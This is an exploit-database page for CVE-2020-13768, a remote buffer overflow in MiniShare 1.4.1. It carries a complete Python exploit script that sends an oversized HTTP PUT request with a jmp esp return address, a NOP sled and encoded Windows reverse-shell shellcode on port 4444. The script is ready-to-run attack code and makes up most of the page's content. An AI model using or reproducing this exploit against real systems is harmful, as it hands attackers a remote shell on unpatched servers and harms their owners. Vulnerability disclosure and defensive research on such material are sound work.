MiniShare 1.4.1 - 'PUT' Remote Buffer Overflow, allows remote attackers to execute arbitrary code via a long HTTP PUT request.

2020.06.05
in Sarang Tumne (IN) in
Risk: High
Local: No
Remote: Yes
CVE: CVE-2020-13768
CWE: CWE-787
Dork: https://github.com/sartlabs/OSCE-Prep/blob/9a9d2471a9de09457f970be4ea1b57a74d26705a/My%20CVEs/Minishare_BOF_PUT.py


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: MiniShare 1.4.1 - 'PUT' Remote Buffer Overflow # Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP PUT request. # Exploit Author: Sarang Tumne @SarT # Date: 3rd June, 2020 # CVE ID: CVE-2020-13768 (SarT) # Confirmed on release 1.4.1 # Vendor: http://minishare.sourceforge.net/ # Vulnerability patched in 1.4.2 and above versions! ############################################### #!/usr/bin/python import socket import sys a=socket.socket(socket.AF_INET,socket.SOCK_STREAM) host=sys.argv[1] port=80 a.connect((host,port)) #buffer="A"*3000 junk="A"*1786 #junk+="B"*4 junk+="\x63\x14\xFF\x76" #jmp esp junk+="\x90"*40 junk+=("\xb8\x2a\x02\xb2\x98\xda\xc5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" #Simple windows/shell/reverse_tcp shell on port 4444; please change this as per your LHOST "\x52\x31\x42\x12\x03\x42\x12\x83\xc0\xfe\x50\x6d\xe8\x17\x16" "\x8e\x10\xe8\x77\x06\xf5\xd9\xb7\x7c\x7e\x49\x08\xf6\xd2\x66" "\xe3\x5a\xc6\xfd\x81\x72\xe9\xb6\x2c\xa5\xc4\x47\x1c\x95\x47" "\xc4\x5f\xca\xa7\xf5\xaf\x1f\xa6\x32\xcd\xd2\xfa\xeb\x99\x41" "\xea\x98\xd4\x59\x81\xd3\xf9\xd9\x76\xa3\xf8\xc8\x29\xbf\xa2" "\xca\xc8\x6c\xdf\x42\xd2\x71\xda\x1d\x69\x41\x90\x9f\xbb\x9b" "\x59\x33\x82\x13\xa8\x4d\xc3\x94\x53\x38\x3d\xe7\xee\x3b\xfa" "\x95\x34\xc9\x18\x3d\xbe\x69\xc4\xbf\x13\xef\x8f\xcc\xd8\x7b" "\xd7\xd0\xdf\xa8\x6c\xec\x54\x4f\xa2\x64\x2e\x74\x66\x2c\xf4" "\x15\x3f\x88\x5b\x29\x5f\x73\x03\x8f\x14\x9e\x50\xa2\x77\xf7" "\x95\x8f\x87\x07\xb2\x98\xf4\x35\x1d\x33\x92\x75\xd6\x9d\x65" "\x79\xcd\x5a\xf9\x84\xee\x9a\xd0\x42\xba\xca\x4a\x62\xc3\x80" "\x8a\x8b\x16\x06\xda\x23\xc9\xe7\x8a\x83\xb9\x8f\xc0\x0b\xe5" "\xb0\xeb\xc1\x8e\x5b\x16\x82\x70\x33\x20\x3e\x19\x46\x50\xaf" "\x85\xcf\xb6\xa5\x25\x86\x61\x52\xdf\x83\xf9\xc3\x20\x1e\x84" "\xc4\xab\xad\x79\x8a\x5b\xdb\x69\x7b\xac\x96\xd3\x2a\xb3\x0c" "\x7b\xb0\x26\xcb\x7b\xbf\x5a\x44\x2c\xe8\xad\x9d\xb8\x04\x97" "\x37\xde\xd4\x41\x7f\x5a\x03\xb2\x7e\x63\xc6\x8e\xa4\x73\x1e" "\x0e\xe1\x27\xce\x59\xbf\x91\xa8\x33\x71\x4b\x63\xef\xdb\x1b" "\xf2\xc3\xdb\x5d\xfb\x09\xaa\x81\x4a\xe4\xeb\xbe\x63\x60\xfc" "\xc7\x99\x10\x03\x12\x1a\x20\x4e\x3e\x0b\xa9\x17\xab\x09\xb4" "\xa7\x06\x4d\xc1\x2b\xa2\x2e\x36\x33\xc7\x2b\x72\xf3\x34\x46" "\xeb\x96\x3a\xf5\x0c\xb3") #junk+="C"*500 buffer=("PUT /"+junk+ "HTTP/1.1" "Host: 192.168.56.112" "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" "Accept-Language: en-US,en;q=0.5" "Accept-Encoding: gzip, deflate" "Connection: close" "Upgrade-Insecure-Requests: 1\r\n\r\n") a.send(buffer) a.close()


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top